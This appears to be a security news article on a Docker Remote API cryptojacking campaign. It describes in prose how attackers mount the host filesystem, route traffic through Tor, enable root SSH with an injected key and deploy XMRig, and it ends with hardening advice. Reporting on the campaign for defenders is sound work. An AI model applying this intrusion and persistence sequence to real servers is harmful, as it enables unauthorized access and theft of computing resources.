Docker API Cryptojacking Campaign Uses Tor Anonymity to Target Cloud Infrastructure

A sophisticated cryptojacking campaign exploiting misconfigured Docker Remote APIs has been uncovered by Trend Micro researchers, revealing how attackers are combining container orchestration vulnerabilities with the Tor anonymity network to stealthily mine cryptocurrency across technology, financial services, and healthcare organizations. The findings, reported on June 23, 2025, highlight a growing threat landscape as cloud infrastructure becomes the primary battleground for crypto-focused cyberattacks.

The Threat Landscape

The campaign begins with a straightforward but devastating reconnaissance technique. Attackers scan the internet for exposed Docker Remote API endpoints, searching for systems where administrators have left management ports accessible without authentication. Once a vulnerable target is identified at IP address 198.199.72.27, the attackers request a complete list of all containers running on the machine.

If no containers are present, the threat actors create a new one based on the standard Alpine Linux Docker image. The critical escalation happens during container creation: the attackers mount the entire host root directory as a volume inside the container, effectively granting themselves access to every file and directory on the physical or virtual host machine. This technique constitutes a full container escape, one of the most dangerous categories of cloud security vulnerabilities.

Bitcoin traded at approximately $105,578 on June 23, while Ethereum sat near $2,422, making cryptocurrency mining a lucrative proposition for threat actors who can hijack enterprise-grade computing resources without bearing the cost of hardware or electricity.

Core Principles

What sets this campaign apart from typical cryptojacking operations is its layered approach to stealth and persistence. After gaining initial access through the Docker API, the attackers execute a Base64-encoded shell script that installs and configures the Tor anonymity network directly within the compromised container. All subsequent command-and-control traffic is routed through Tor using the socks5h protocol, which handles both traffic routing and DNS resolution through the anonymization layer.

The final payload is fetched from a .onion domain, ensuring that the malware distribution infrastructure itself is hidden within the Tor network. This makes attribution and takedown efforts significantly more difficult for security researchers and law enforcement agencies.

Tooling & Setup

Once the container is created and Tor is operational, the attackers deploy a shell script called docker-init.sh that systematically transforms the compromised host into a persistent cryptocurrency mining operation. The script first checks for the mounted host root directory, then modifies the system’s SSH configuration to enable root login and injects an attacker-controlled public key into the authorized_keys file.

The threat actors install a toolkit that includes masscan for high-speed network scanning, libpcap for packet capture, zstd for data compression, and torsocks for Tor-aware network operations. The infected system then beacons back to the command-and-control server with detailed system information before receiving the primary payload: a dropper binary that deploys the XMRig cryptocurrency miner along with pre-configured wallet addresses and mining pool URLs.

The use of masscan is particularly concerning because it enables the attackers to use each compromised host as a launching pad for further reconnaissance, potentially turning a single misconfigured Docker instance into a gateway for broader network compromise.

Ongoing Vigilance

Organizations running containerized infrastructure must treat Docker API security as a critical priority. The attack vector exploited here, exposed Remote API endpoints, is entirely preventable through proper configuration. Docker daemons should never be exposed to the public internet without TLS authentication and proper firewall rules. Organizations should implement network segmentation to isolate container orchestration management interfaces, deploy runtime security monitoring to detect unauthorized container creation and suspicious network connections, and establish baseline resource consumption metrics to identify cryptojacking activity through abnormal CPU usage patterns.

Security teams should also monitor for the installation of Tor-related packages and tools on production systems, as the presence of torsocks or .onion domain connections in network logs is a strong indicator of compromise.

Final Takeaway

The convergence of container exploitation and anonymity networks represents an evolution in cryptojacking sophistication that demands a corresponding evolution in defensive capabilities. The campaign mirrors techniques previously attributed to an actor known as Commando Cat, suggesting that successful attack methodologies are being iterated and refined across multiple threat groups. As organizations continue to expand their container footprints, the attack surface for these types of campaigns will only grow, making proactive hardening of Docker configurations an operational necessity rather than a best practice.

Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always conduct your own research and consult with security professionals regarding infrastructure protection.